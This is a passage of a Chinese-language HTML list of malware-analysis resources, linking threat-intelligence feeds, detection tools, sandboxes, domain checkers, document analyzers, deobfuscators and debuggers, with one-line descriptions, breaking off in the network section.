id="开源威胁情报"><a href="#开源威胁情报" class="headerlink" title="开源威胁情报"></a>开源威胁情报</h2><h3 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h3><p><em>收集、分析 IOC 信息</em></p><ul><li><a href="https://github.com/abusesa/abusehelper" target="_blank" rel="external">AbuseHelper</a> - 用于接收和重新分发威胁情报的开源框架</li><li><a href="https://otx.alienvault.com/" target="_blank" rel="external">AlienVault Open Threat Exchange</a> - 威胁情报的共享与合作</li><li><a href="https://github.com/mlsecproject/combine" target="_blank" rel="external">Combine</a> - 从公开的信息源中得到威胁情报信息</li><li><a href="https://github.com/keithjjones/fileintel" target="_blank" rel="external">Fileintel</a> - 文件情报</li><li><a href="https://github.com/keithjjones/hostintel" target="_blank" rel="external">Hostintel</a> - 主机情报</li><li><a href="https://www.enisa.europa.eu/activities/cert/support/incident-handling-automation" target="_blank" rel="external">IntelMQ</a> - CERT 使用消息队列来处理应急数据的工具</li><li><a href="https://www.mandiant.com/resources/download/ioc-editor/" target="_blank" rel="external">IOC Editor</a> - Mandiant 出品的一个免费的 XML IOC 文件编辑器</li><li><a href="https://github.com/mandiant/ioc_writer" target="_blank" rel="external">ioc_writer</a> - 开发的用于 OpenIOC 对象的 Python 库</li><li><a href="https://github.com/csirtgadgets/massive-octo-spice" target="_blank" rel="external">Massive Octo Spice</a> - 由 <a href="http://csirtgadgets.org/collective-intelligence-framework" target="_blank" rel="external">CSIRT Gadgets Foundation</a>发起，之前叫做 CIF (Collective Intelligence Framework)，从各种信息源聚合 IOC 信息</li><li><a href="https://github.com/MISP/MISP" target="_blank" rel="external">MISP</a> - 由 <a href="http://www.misp-project.org/" target="_blank" rel="external">The MISP Project</a> 发起的恶意软件信息共享平台</li><li><a href="https://www.passivetotal.org/" target="_blank" rel="external">PassiveTotal</a> - 研究、链接、标注和分享 IP 与 域名</li><li><a href="https://github.com/pidydx/PyIOCe" target="_blank" rel="external">PyIOCe</a> - 一个 Python OpenIOC 编辑器</li><li><a href="https://github.com/jpsenior/threataggregator" target="_blank" rel="external">threataggregator</a> - 聚合来自多个信息源的安全威胁，包括 <a href="#other-resources">other resources</a> 列表中的一些</li><li><a href="https://www.threatcrowd.org/" target="_blank" rel="external">ThreatCrowd</a> - 带有图形可视化的威胁搜索引擎</li><li><a href="https://github.com/mlsecproject/tiq-test" target="_blank" rel="external">TIQ-test</a> - 威胁情报源的数据可视化和统计分析</li></ul><h3 id="其他资源"><a href="#其他资源" class="headerlink" title="其他资源"></a>其他资源</h3><p><em>威胁情报和 IOC 资源</em></p><ul><li><a href="http://autoshun.org/" target="_blank" rel="external">Autoshun</a> (<a href="http://autoshun.org/" target="_blank" rel="external">list</a>) - Snort 插件和黑名单</li><li><a href="http://osint.bambenekconsulting.com/feeds/" target="_blank" rel="external">Bambenek Consulting Feeds</a> - 基于恶意 DGA 算法的 OSINT 订阅</li><li><a href="https://www.fidelissecurity.com/resources/fidelis-barncat" target="_blank" rel="external">Fidelis Barncat</a> - 可扩展的恶意软件配置数据库（必须有请求权限）</li><li><a href="http://www.ciarmy.com/" target="_blank" rel="external">CI Army</a> (<a href="http://www.ciarmy.com/list/ci-badguys.txt" target="_blank" rel="external">list</a>) - 网络安全黑名单</li><li><a href="https://intel.CriticalStack.com" target="_blank" rel="external">Critical Stack- Free Intel Market</a> - 免费的英特尔去重聚合项目，有超过 90 种订阅以及超过一百二十万个威胁情报信息</li><li><a href="http://threatcenter.crdf.fr/" target="_blank" rel="external">CRDF ThreatCenter</a> - 由 CRDF 提供的新威胁检出</li><li><a href="http://cybercrime-tracker.net/" target="_blank" rel="external">Cybercrime tracker</a> - 多个僵尸网络的活动跟踪</li><li><a href="https://github.com/fireeye/iocs" target="_blank" rel="external">FireEye IOCs</a> - 由 FireEye 共享的 IOC 信息</li><li><a href="https://iplists.firehol.org/" target="_blank" rel="external">FireHOL IP Lists</a> - 针对攻击、恶意软件的更改历史、国家地图和保留政策的 350+ IP 的跟踪</li><li><a href="https://github.com/rep/hpfeeds" target="_blank" rel="external">hpfeeds</a> - 蜜罐订阅协议</li><li><a href="https://isc.sans.edu/" target="_blank" rel="external">Internet Storm Center (DShield)</a> - 日志和可搜索的事件数据库，并且带有 Web <a href="https://dshield.org/api/" target="_blank" rel="external">API</a>(<a href="https://github.com/rshipp/python-dshield" target="_blank" rel="external">非官方 Python 库</a>).</li><li><a href="http://malc0de.com/database/" target="_blank" rel="external">malc0de</a> - 搜索事件数据库</li><li><a href="http://www.malwaredomainlist.com/" target="_blank" rel="external">Malware Domain List</a> - 搜索和分享恶意软件 URL</li><li><a href="http://openioc.org/" target="_blank" rel="external">OpenIOC</a> - 威胁情报共享框架</li><li><a href="https://palevotracker.abuse.ch/blocklists.php" target="_blank" rel="external">Palevo Blocklists</a> - 蜜罐 C&amp;C 黑名单</li><li><a href="https://www.proofpoint.com/us/products/et-intelligence" target="_blank" rel="external">Proofpoint Threat Intelligence</a> - 以前新兴威胁的规则集</li><li><a href="https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml" target="_blank" rel="external">Ransomware overview</a> - 勒索软件的概述列表</li><li><a href="http://stix.mitre.org/" target="_blank" rel="external">STIX - Structured Threat Information eXpression</a> - 通过标准化的语言来表示、共享网络威胁信息<br><a href="http://mitre.org" target="_blank" rel="external">MITRE</a> 相关:<ul><li><a href="http://capec.mitre.org/" target="_blank" rel="external">CAPEC - 常见攻击模式枚举与分类</a></li><li><a href="http://cybox.mitre.org/" target="_blank" rel="external">CybOX - 网络观测 eXpression</a></li><li><a href="http://maec.mitre.org/" target="_blank" rel="external">MAEC - 恶意软件特征枚举与界定</a></li><li><a href="http://taxii.mitre.org/" target="_blank" rel="external">TAXII - 可信的指标信息自动化交换</a></li></ul></li><li><a href="https://threatrecon.co/" target="_blank" rel="external">threatRECON</a> - 搜索指标，每月最多一千次</li><li><a href="https://github.com/Yara-Rules/rules" target="_blank" rel="external">Yara rules</a> - Yara 规则集</li><li><a href="https://zeustracker.abuse.ch/blocklist.php" target="_blank" rel="external">ZeuS Tracker</a> - ZeuS 黑名单</li></ul><h2 id="检测与分类"><a href="#检测与分类" class="headerlink" title="检测与分类"></a>检测与分类</h2><p><em>反病毒和其他恶意软件识别工具</em></p><ul><li><a href="https://github.com/hiddenillusion/AnalyzePE" target="_blank" rel="external">AnalyzePE</a> - Windows PE 文件的分析器</li><li><a href="http://www.chkrootkit.org/" target="_blank" rel="external">chkrootkit</a> - 本地 Linux rootkit 检测</li><li><a href="http://www.clamav.net/" target="_blank" rel="external">ClamAV</a> - 开源反病毒引擎</li><li><a href="https://github.com/horsicq/Detect-It-Easy" target="_blank" rel="external">Detect-It-Easy</a> - 用于确定文件类型的程序</li><li><a href="http://www.sno.phy.queensu.ca/~phil/exiftool/" target="_blank" rel="external">ExifTool</a> - 读、写、编辑文件的元数据</li><li><a href="http://www.sno.phy.queensu.ca/%7Ephil/exiftool/" target="_blank" rel="external">File Scanning Framework</a> - 模块化的递归文件扫描解决方案</li><li><a href="https://github.com/jessek/hashdeep" target="_blank" rel="external">hashdeep</a> - 用各种算法计算哈希值</li><li><a href="https://github.com/Neo23x0/Loki" target="_blank" rel="external">Loki</a> - 基于主机的 IOC 扫描器</li><li><a href="https://github.com/Dynetics/Malfunction" target="_blank" rel="external">Malfunction</a> - 在功能层面对恶意软件进行分类和比较</li><li><a href="https://github.com/KoreLogicSecurity/mastiff" target="_blank" rel="external">MASTIFF</a> - 静态分析框架</li><li><a href="https://github.com/MITRECND/multiscanner" target="_blank" rel="external">MultiScanner</a> - 模块化文件扫描/分析框架</li><li><a href="https://github.com/rjhansen/nsrllookup" target="_blank" rel="external">nsrllookup</a> - 查询 NIST’s National Software Reference Library 数据库中哈希的工具</li><li><a href="http://handlers.sans.org/jclausing/packerid.py" target="_blank" rel="external">packerid</a> - 跨平台的 PEiD 的替代品</li><li><a href="http://pev.sourceforge.net/" target="_blank" rel="external">PEV</a> - 为正确分析可疑的二进制文件提供功能丰富工具的 PE 文件多平台分析工具集</li><li><a href="http://rkhunter.sourceforge.net/" target="_blank" rel="external">Rootkit Hunter</a> - 检测 Linux 的 rootkits</li><li><a href="http://ssdeep.sourceforge.net/" target="_blank" rel="external">ssdeep</a> - 计算模糊哈希值</li><li><a href="https://gist.github.com/malc0de/10270150" target="_blank" rel="external">totalhash.py</a> - 一个简单搜索<a href="http://totalhash.com/" target="_blank" rel="external">TotalHash.com</a> 数据库的 Python 脚本</li><li><a href="http://mark0.net/soft-trid-e.html" target="_blank" rel="external">TrID</a> - 文件识别</li><li><a href="https://plusvic.github.io/yara/" target="_blank" rel="external">YARA</a> - 分析师利用的模式识别工具</li><li><a href="https://github.com/Neo23x0/yarGen" target="_blank" rel="external">Yara rules generator</a> - 基于恶意样本生成 yara 规则，也包含避免误报的字符串数据库</li></ul><h2 id="在线扫描与沙盒"><a href="#在线扫描与沙盒" class="headerlink" title="在线扫描与沙盒"></a>在线扫描与沙盒</h2><p><em>基于 Web 的多反病毒引擎扫描器和恶意软件自动分析的沙盒</em></p><ul><li><a href="https://www.apk-analyzer.net/" target="_blank" rel="external">APK Analyzer</a> - APK 免费动态分析</li><li><a href="https://andrototal.org/" target="_blank" rel="external">AndroTotal</a> - 利用多个移动反病毒软件进行免费在线分析 App</li><li><a href="https://avcaesar.malware.lu/" target="_blank" rel="external">AVCaesar</a> - Malware.lu 在线扫描器和恶意软件集合</li><li><a href="http://www.cryptam.com/" target="_blank" rel="external">Cryptam</a> - 分析可疑的 Office 文档</li><li><a href="http://cuckoosandbox.org/" target="_blank" rel="external">Cuckoo Sandbox</a> - 开源、自主的沙盒和自动分析系统</li><li><a href="https://github.com/brad-accuvant/cuckoo-modified" target="_blank" rel="external">cuckoo-modified</a> - GPL 许可证的 Cuckoo 沙盒的修改版，由于法律原因作者没有将其分支合并</li><li><a href="https://github.com/brad-accuvant/cuckoo-modified" target="_blank" rel="external">cuckoo-modified-api</a> - 用于控制 cuckoo-modified 沙盒的 Python API</li><li><a href="https://www.deepviz.com/" target="_blank" rel="external">DeepViz</a> - 通过机器学习分类来分析的多格式文件分析器</li><li><a href="https://github.com/detuxsandbox/detux/" target="_blank" rel="external">detux</a> - 一个用于对 Linux 恶意软件流量分析与 IOC 信息捕获的沙盒</li><li><a href="https://www.document-analyzer.net/" target="_blank" rel="external">Document Analyzer</a> - DOC 和 PDF 文件的免费动态分析</li><li><a href="https://github.com/tklengyel/drakvuf" target="_blank" rel="external">DRAKVUF</a> - 动态恶意软件分析系统</li><li><a href="https://www.file-analyzer.net/" target="_blank" rel="external">File Analyzer</a> - 免费 PE 文件动态分析</li><li><a href="http://firmware.re/" target="_blank" rel="external">firmware.re</a> - 解包、扫描、分析绝大多数固件包</li><li><a href="https://www.hybrid-analysis.com/" target="_blank" rel="external">Hybrid Analysis</a> - 由 VxSandbox 支持的在线恶意软件分析工具</li><li><a href="http://irma.quarkslab.com/" target="_blank" rel="external">IRMA</a> - 异步、可定制的可疑文件分析平台</li><li><a href="https://www.joesecurity.org/" target="_blank" rel="external">Joe Sandbox</a> - 深度恶意软件分析</li><li><a href="https://virusscan.jotti.org/en" target="_blank" rel="external">Jotti</a> - 免费在线多反病毒引擎扫描器</li><li><a href="https://github.com/monnappa22/Limon" target="_blank" rel="external">Limon</a> - 分析 Linux 恶意软件的沙盒</li><li><a href="https://github.com/rieck/malheur" target="_blank" rel="external">Malheur</a> - 恶意行为的自动化沙盒分析</li><li><a href="https://malwareconfig.com/" target="_blank" rel="external">Malware config</a> - 从常见的恶意软件提取、解码和在线配置</li><li><a href="https://malwr.com/" target="_blank" rel="external">Malwr</a> - 免费的在线 Cuckoo 沙盒分析实例</li><li><a href="https://mastiff-online.korelogic.com/" target="_blank" rel="external">MASTIFF Online</a> - 在线恶意软件静态分析</li><li><a href="https://www.metadefender.com/" target="_blank" rel="external">Metadefender.com</a> - 扫描文件、哈希或恶意软件的 IP 地址</li><li><a href="https://www.networktotal.com/index.html" target="_blank" rel="external">NetworkTotal</a> - 一个分析 pcap 文件的服务，使用配置了 EmergingThreats Pro 的Suricata 快速检测病毒、蠕虫、木马和各种恶意软件</li><li><a href="https://github.com/Rurik/Noriben" target="_blank" rel="external">Noriben</a> - 使用 Sysinternals Procmon 收集恶意软件在沙盒环境下的进程信息</li><li><a href="http://www.pdfexaminer.com/" target="_blank" rel="external">PDF Examiner</a> - 收集可疑的 PDF 文件</li><li><a href="http://www.procdot.com/" target="_blank" rel="external">ProcDot</a> - 一个可视化恶意软件分析工具集</li><li><a href="https://github.com/secretsquirrel/recomposer" target="_blank" rel="external">Recomposer</a> - 安全上传二进制程序到沙盒网站的辅助脚本</li><li><a href="http://sanddroid.xjtu.edu.cn/" target="_blank" rel="external">Sand droid</a> - 自动化、完整的 Android 应用程序分析系统</li><li><a href="https://github.com/F-Secure/see" target="_blank" rel="external">SEE</a> - 在安全环境中构建测试自动化的框架</li><li><a href="https://www.url-analyzer.net/" target="_blank" rel="external">URL Analyzer</a> - 对 URL 文件的动态分析</li><li><a href="https://www.virustotal.com/" target="_blank" rel="external">VirusTotal</a> - 免费的在线恶意软件样本和 URL 分析</li><li><a href="https://github.com/keithjjones/visualize_logs" target="_blank" rel="external">Visualize_Logs</a> - 用于日志的开源可视化库和命令行工具（Cuckoo、Procmon 等）</li><li><a href="https://zeltser.com/automated-malware-analysis/" target="_blank" rel="external">Zeltser’s List</a> - Lenny Zeltser 创建的免费自动沙盒服务</li></ul><h2 id="域名分析"><a href="#域名分析" class="headerlink" title="域名分析"></a>域名分析</h2><p><em>检查域名和 IP 地址</em></p><ul><li><a href="http://desenmascara.me" target="_blank" rel="external">Desenmascara.me</a> - 一键点击即可得到尽可能多的检索元数据以评估一个网站的信誉度</li><li><a href="http://networking.ringofsaturn.com/" target="_blank" rel="external">Dig</a> - 免费的在线 dig 以及其他网络工具</li><li><a href="https://github.com/elceef/dnstwist" target="_blank" rel="external">dnstwist</a> - 用于检测钓鱼网站和公司间谍活动的域名排名网站</li><li><a href="https://github.com/hiddenillusion/IPinfo" target="_blank" rel="external">IPinfo</a> - 通过搜索在线资源收集关于 IP 或 域名的信息</li><li><a href="https://github.com/hurricanelabs/machinae" target="_blank" rel="external">Machinae</a> - 类似 Automator 的 OSINT 工具，用于收集有关 URL、IP 或哈希的信息</li><li><a href="https://github.com/FGRibreau/mailchecker" target="_blank" rel="external">mailchecker</a> - 跨语言临时邮件检测库</li><li><a href="https://github.com/michael-yip/MaltegoVT" target="_blank" rel="external">MaltegoVT</a> - 让 Maltego 使用 VirusTotal API，允许搜索域名、IP 地址、文件哈希、报告</li><li><a href="http://multirbl.valli.org/" target="_blank" rel="external">Multi rbl</a> - 多个 DNS 黑名单，反向查找超过 300 个 RBL。</li><li><a href="http://www.senderbase.org/" target="_blank" rel="external">SenderBase</a> - 搜索 IP、域名或网络的所有者</li><li><a href="https://www.spamcop.net/bl.shtml" target="_blank" rel="external">SpamCop</a> - 垃圾邮件 IP 黑名单IP</li><li><a href="http://www.spamhaus.org/lookup/" target="_blank" rel="external">SpamHaus</a> - 基于域名和 IP 的黑名单</li><li><a href="https://sitecheck.sucuri.net/" target="_blank" rel="external">Sucuri SiteCheck</a> - 免费的网站恶意软件与安全扫描器</li><li><a href="http://www.tekdefense.com/automater/" target="_blank" rel="external">TekDefense Automator</a> - 收集关于 URL、IP 和哈希值的 OSINT 工具</li><li><a href="http://urlquery.net/" target="_blank" rel="external">URLQuery</a> - 免费的 URL 扫描器</li><li><a href="http://whois.domaintools.com/" target="_blank" rel="external">Whois</a> - DomainTools 家免费的 whois 搜索</li><li><a href="https://zeltser.com/lookup-malicious-websites/" target="_blank" rel="external">Zeltser’s List</a> - 由 Lenny Zeltser 整理的免费在线恶意软件工具集</li><li><a href="http://zulu.zscaler.com/#" target="_blank" rel="external">ZScalar Zulu</a> - Zulu URL 风险分析</li></ul><h2 id="浏览器恶意软件"><a href="#浏览器恶意软件" class="headerlink" title="浏览器恶意软件"></a>浏览器恶意软件</h2><p><em>分析恶意 URL，也可以参考 <a href="#domain-analysis">domain analysis</a> 和 <a href="#documents-and-shellcode">documents and shellcode</a> 部分</em></p><ul><li><a href="http://getfirebug.com/" target="_blank" rel="external">Firebug</a> - Firefox Web 开发扩展</li><li><a href="http://jd.benow.ca/" target="_blank" rel="external">Java Decompiler</a> - 反编译并检查 Java 的应用</li><li><a href="https://github.com/Rurik/Java_IDX_Parser/" target="_blank" rel="external">Java IDX Parser</a> - 解析 Java IDX 缓存文件</li><li><a href="http://www.relentless-coding.com/projects/jsdetox/" target="_blank" rel="external">JSDetox</a> - JavaScript 恶意软件分析工具</li><li><a href="https://github.com/urule99/jsunpack-n" target="_blank" rel="external">jsunpack-n</a> - 一个 javascript 解压软件，可以模拟浏览器功能</li><li><a href="https://github.com/Storyyeller/Krakatau" target="_blank" rel="external">Krakatau</a> - Java 的反编译器、汇编器与反汇编器</li><li><a href="http://malzilla.sourceforge.net/" target="_blank" rel="external">Malzilla</a> - 分析恶意 Web 页面</li><li><a href="https://github.com/CyberShadow/RABCDAsm" target="_blank" rel="external">RABCDAsm</a> - 一个健壮的 ActionScript 字节码反汇编</li><li><a href="http://www.swftools.org/" target="_blank" rel="external">swftools</a> - PDF 转换成 SWF 的工具</li><li><a href="http://hooked-on-mnemonics.blogspot.com/2011/12/xxxswfpy.html" target="_blank" rel="external">xxxswf</a> - 分析 Flash 文件的 Python 脚本</li></ul><h2 id="文档和-Shellcode"><a href="#文档和-Shellcode" class="headerlink" title="文档和 Shellcode"></a>文档和 Shellcode</h2><p><em>在 PDF、Office 文档中分析恶意 JS 和 Shellcode，也可参考<a href="#browser-malware">browser malware</a> 部分</em></p><ul><li><a href="https://github.com/hiddenillusion/AnalyzePDF" target="_blank" rel="external">AnalyzePDF</a> - 分析 PDF 并尝试判断其是否是恶意文件的工具</li><li><a href="https://github.com/CapacitorSet/box-js" target="_blank" rel="external">box-js</a> - 用于研究 JavaScript 恶意软件的工具，支持 JScript/WScript 和 ActiveX 仿真功能</li><li><a href="http://www.ragestorm.net/distorm/" target="_blank" rel="external">diStorm</a> - 分析恶意 Shellcode 的反汇编器</li><li><a href="http://jsbeautifier.org/" target="_blank" rel="external">JS Beautifier</a> - JavaScript 脱壳和去混淆</li><li><a href="http://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/" target="_blank" rel="external">JS Deobfuscator </a>- 对那些使用 eval 或 document.write 的简单 Javascript 去混淆</li><li><a href="http://libemu.carnivore.it/" target="_blank" rel="external">libemu</a> - x86 shellcode 仿真的库和工具</li><li><a href="https://github.com/9b/malpdfobj" target="_blank" rel="external">malpdfobj</a> - 解构恶意 PDF 为 JSON 表示</li><li><a href="http://www.reconstructer.org/code.html" target="_blank" rel="external">OfficeMalScanner</a> - 扫描 MS Office 文档中的恶意跟踪</li><li><a href="http://www.decalage.info/python/olevba" target="_blank" rel="external">olevba</a> - 解析 OLE 和 OpenXML 文档，并提取有用信息的脚本</li><li><a href="https://code.google.com/p/origami-pdf/" target="_blank" rel="external">Origami PDF</a> - 一个分析恶意 PDF 的工具</li><li><a href="http://blog.didierstevens.com/programs/pdf-tools/" target="_blank" rel="external">PDF Tools</a> - Didier Stevens 开发的许多关于 PDF 的工具</li><li><a href="https://github.com/9b/pdfxray_lite" target="_blank" rel="external">PDF X-Ray Lite</a> - PDF 分析工具，PDF X-RAY 的无后端版本</li><li><a href="http://eternal-todo.com/tools/peepdf-pdf-analysis-tool" target="_blank" rel="external">peepdf</a> - 用来探索可能是恶意的 PDF 的 Python 工具</li><li><a href="https://www.quicksand.io/" target="_blank" rel="external">QuickSand</a> - QuickSand 是一个紧凑的 C 框架，用于分析可疑的恶意软件文档，以识别不同编码流中的漏洞，并定位和提取嵌入的可执行文件</li><li><a href="https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey" target="_blank" rel="external">Spidermonkey</a> - Mozilla 的 JavaScript 引擎，用来调试可疑 JS 代码</li></ul><h2 id="文件提取"><a href="#文件提取" class="headerlink" title="文件提取"></a>文件提取</h2><p><em>从硬盘和内存镜像中提取文件</em></p><ul><li><a href="https://github.com/simsong/bulk_extractor" target="_blank" rel="external">bulk_extractor</a> - 快速文件提取工具</li><li><a href="https://github.com/williballenthin/EVTXtract" target="_blank" rel="external">EVTXtract</a> - 从原始二进制数据提取 Windows 事件日志文件</li><li><a href="http://foremost.sourceforge.net/" target="_blank" rel="external">Foremost</a> - 由 US Air Force 设计的文件提取工具</li><li><a href="https://bitbucket.org/haypo/hachoir" target="_blank" rel="external">Hachoir</a> - 处理二进制程序的 Python 库的集合</li><li><a href="https://github.com/sleuthkit/scalpel" target="_blank" rel="external">Scalpel</a> - 另一个数据提取工具</li></ul><h2 id="去混淆"><a href="#去混淆" class="headerlink" title="去混淆"></a>去混淆</h2><p><em>破解异或或其它代码混淆方法</em></p><ul><li><a href="https://bitbucket.org/decalage/balbuzard/wiki/Home" target="_blank" rel="external">Balbuzard</a> - 去除混淆(XOR、ROL等)的恶意软件分析工具</li><li><a href="https://github.com/0xd4d/de4dot" target="_blank" rel="external">de4dot</a> - .NET 去混淆与脱壳</li><li><a href="http://hooked-on-mnemonics.blogspot.com/2014/04/expexorpy.html" target="_blank" rel="external">ex_pe_xor</a> 和 <a href="http://hooked-on-mnemonics.blogspot.com/p/iheartxor.html" target="_blank" rel="external">iheartxor</a> - Alexander Hanel 开发的用于去除单字节异或编码的文件的两个工具</li><li><a href="https://github.com/fireeye/flare-floss" target="_blank" rel="external">FLOSS</a> - FireEye 实验室的混淆字符串求解工具，使用高级静态分析技术来自动去除恶意软件二进制文件中的字符串</li><li><a href="https://github.com/hiddenillusion/NoMoreXOR" target="_blank" rel="external">NoMoreXOR</a> - 通过频率分析来猜测一个 256 字节的异或密钥</li><li><a href="https://github.com/BromiumLabs/PackerAttacker" target="_blank" rel="external">PackerAttacker</a> - Windows 恶意软件的通用隐藏代码提取程序</li><li><a href="https://github.com/malwaremusings/unpacker/" target="_blank" rel="external">unpacker</a> - 基于 WinAppDbg 的自动 Windows 恶意软件脱壳器</li><li><a href="https://github.com/tomchop/unxor/" target="_blank" rel="external">unxor</a> - 通过已知明文攻击来猜测一个异或密钥</li><li><a href="https://github.com/jnraber/VirtualDeobfuscator" target="_blank" rel="external">VirtualDeobfuscator</a> - 虚拟逆向分析工具</li><li><a href="http://eternal-todo.com/var/scripts/xorbruteforcer" target="_blank" rel="external">XORBruteForcer</a> - 爆破单字节异或密钥的 Python 脚本</li><li><a href="http://blog.didierstevens.com/programs/xorsearch/" target="_blank" rel="external">XORSearch 和 XORStrings</a> - Didier Stevens 开发的用于寻找异或混淆后数据的两个工具</li><li><a href="https://github.com/hellman/xortool" target="_blank" rel="external">xortool</a> - 猜测异或密钥和密钥的长度</li></ul><h2 id="调试和逆向工程"><a href="#调试和逆向工程" class="headerlink" title="调试和逆向工程"></a>调试和逆向工程</h2><p><em>反编译器、调试器和其他静态、动态分析工具</em></p><ul><li><a href="https://github.com/angr/angr" target="_blank" rel="external">angr</a> - UCSB 的安全实验室开发的跨平台二进制分析框架</li><li><a href="https://github.com/bwall/bamfdetect" target="_blank" rel="external">bamfdetect</a> - 识别和提取奇迹人和其他恶意软件的信息</li><li><a href="https://github.com/BinaryAnalysisPlatform/bap" target="_blank" rel="external">BAP</a> - CMU 的安全实验室开发的跨平台开源二进制分析框架</li><li><a href="https://github.com/programa-stic/barf-project" target="_blank" rel="external">BARF</a> - 跨平台、开源二进制分析逆向框架</li><li><a href="https://github.com/google/binnavi" target="_blank" rel="external">binnavi</a> - 基于图形可视化的二进制分析 IDE</li><li><a href="http://binwalk.org/" target="_blank" rel="external">Binwalk</a> - 固件分析工具</li><li><a href="https://inguma.eu/projects/bokken" target="_blank" rel="external">Bokken</a> - Pyew 和 Radare 的界面版</li><li><a href="https://github.com/aquynh/capstone" target="_blank" rel="external">Capstone</a> - 二进制分析反汇编框架，支持多种架构和许多语言</li><li><a href="https://github.com/hugsy/codebro" target="_blank" rel="external">codebro</a> - 使用 clang 提供基础代码分析的 Web 端代码浏览器</li><li><a href="https://github.com/0xd4d/dnSpy" target="_blank" rel="external">dnSpy</a> - .NET 编辑器、编译器、调试器</li><li><a href="http://codef00.com/projects#debugger" target="_blank" rel="external">Evan’s Debugger (EDB)</a> - Qt GUI 程序的模块化调试器</li><li><a href="https://github.com/rabbitstack/fibratus" target="_blank" rel="external">Fibratus</a> - 探索、跟踪 Windows 内核的工具</li><li><a href="http://www.mcafee.com/us/downloads/free-tools/fport.aspx#" target="_blank" rel="external">FPort</a> - 实时查看系统中打开的 TCP/IP 和 UDP 端口，并映射到应用程序</li><li><a href="http://www.sourceware.org/gdb/" target="_blank" rel="external">GDB</a> - GNU 调试器</li><li><a href="https://github.com/hugsy/gef" target="_blank" rel="external">GEF</a> - 针对开发人员和逆向工程师的 GDB 增强版</li><li><a href="https://github.com/codypierce/hackers-grep" target="_blank" rel="external">hackers-grep</a> - 用来搜索 PE 程序中的导入表、导出表、字符串、调试符号</li><li><a href="https://www.hex-rays.com/products/ida/index.shtml" target="_blank" rel="external">IDA Pro</a> - Windows 反汇编和调试器，有免费评估版</li><li><a href="http://debugger.immunityinc.com/" target="_blank" rel="external">Immunity Debugger</a> - 带有 Python API 的恶意软件调试器</li><li><a href="http://ltrace.org/" target="_blank" rel="external">ltrace</a> - Linux 可执行文件的动态分析</li><li><a href="https://en.wikipedia.org/wiki/Objdump" target="_blank" rel="external">objdump</a> - GNU 工具集的一部分，面向 Linux 二进制程序的静态分析</li><li><a href="http://www.ollydbg.de/" target="_blank" rel="external">OllyDbg</a> - Windows 可执行程序汇编级调试器</li><li><a href="https://github.com/moyix/panda" target="_blank" rel="external">PANDA</a> - 动态分析平台</li><li><a href="https://github.com/longld/peda" target="_blank" rel="external">PEDA</a> - 基于 GDB 的 Pythton Exploit 开发辅助工具，增强显示及增强的命令</li><li><a href="https://winitor.com/" target="_blank" rel="external">pestudio</a> - Windows 可执行程序的静态分析</li><li><a href="https://github.com/joelpx/plasma" target="_blank" rel="external">plasma</a> - 面向 x86/ARM/MIPS 的交互式反汇编器</li><li><a href="https://www.mzrst.com/" target="_blank" rel="external">PPEE (puppy)</a> - 专业的 PE 文件资源管理器</li><li><a href="https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx" target="_blank" rel="external">Process Explorer </a>- 高级 Windows 任务管理器</li><li><a href="https://technet.microsoft.com/en-us/sysinternals/bb896645.aspx" target="_blank" rel="external">Process Monitor</a> - Windows 下高级程序监控工具</li><li><a href="https://technet.microsoft.com/en-us/sysinternals/pstools.aspx" target="_blank" rel="external">PSTools</a> - 可以帮助管理员实时管理系统的 Windows 命令行工具</li><li><a href="https://github.com/joxeankoret/pyew" target="_blank" rel="external">Pyew</a> - 恶意软件分析的 Python 工具</li><li><a href="http://www.radare.org/r/" target="_blank" rel="external">Radare2</a> - 带有调试器支持的逆向工程框架</li><li><a href="https://retdec.com/" target="_blank" rel="external">RetDec</a> - 可重定向的机器码反编译器，同时有在线反编译服务和 API</li><li><a href="https://github.com/vrtadmin/ROPMEMU" target="_blank" rel="external">ROPMEMU</a> - 分析、解析、反编译复杂的代码重用攻击的框架</li><li><a href="https://github.com/pidydx/SMRT" target="_blank" rel="external">SMRT</a> - Sublime 3 中辅助恶意软件分析的插件</li><li><a href="http://sourceforge.net/projects/strace/" target="_blank" rel="external">strace</a> - Linux 可执行文件的动态分析</li><li><a href="http://triton.quarkslab.com/" target="_blank" rel="external">Triton</a> - 一个动态二进制分析框架</li><li><a href="https://github.com/vmt/udis86" target="_blank" rel="external">Udis86</a> - x86 和 x86_64 的反汇编库和工具</li><li><a href="https://github.com/vivisect/vivisect" target="_blank" rel="external">Vivisect</a> - 恶意软件分析的 Python 工具</li><li><a href="https://github.com/x64dbg/" target="_blank" rel="external">X64dbg</a> - Windows 的一个开源 x64/x32 调试器</li></ul><h2 id="网络"><a href="#网络" class="headerlink" title="网络"></a>网络</h2><p><em>分析网络交互</em></p><ul><li><a href="https://www.bro.org" target="_blank" rel="external">Bro</a> - 支持惊人规模的文件和网络协议的协议分析工具</li><li><a href="https://github.com/hempnall/broyara" target="_blank" rel="external">BroYara</a> - 基于 Bro 的 Yara 规则集</li><li><a href="https://github.com/omriher/CapTipper" target="_blank" rel="external">CapTipper</a> - 恶意 HTTP 流量管理器</li><li><a href="https://github.com/MITRECND/chopshop" target="_blank" rel="external">chopshop</a> - 协议分析和解码框架</li><li><a href="http://www.telerik.com/fiddler" target="_blank" rel="external">Fiddler</a> - 专为 Web 调试开发的 Web 代理</li><li><a href="https://github.com/pjlantz/Hale" target="_blank" rel="external">Hale</a> - 僵尸网络 C&amp;C 监视器</li><li><a href="http://www.haka-security.org/" target="_blank" rel="external">Haka</a> - 一个安全导向的开源语言，用于在实时流量捕获时描述协议、应用安全策略</li><li><a href="http://www.inetsim.org/" target="_blank" rel="external">INetSim</a> - 网络服务模拟。建设一个恶意软件分析实验室十分有用</li><li><a href="https://github.com/lmco/laikaboss" target="_blank" rel="external">Laika BOSS</a> - Laika BOSS 是一种以文件为中心的恶意软件分析和入侵检测系统</li><li><a href="https://github.com/tomchop/malcom" target="_blank" rel="external">Malcom</a> - 恶意软件通信分析仪</li><li><a href="https://github.com/stamparm/maltrail" target="_blank" rel="external">Maltrail</a> - 一个恶意流量检测系统，利用公开的黑名单来检测恶意和可疑的通信流量，带有一个报告和分析界面</li><li><a href="https://mitmproxy.org/" target="_blank" rel="external">mitmproxy</a> - 拦截网络流量通信</li><li><a href="https://github.com/aol/moloch" target="_blank" rel="external">Moloch</a> - IPv4 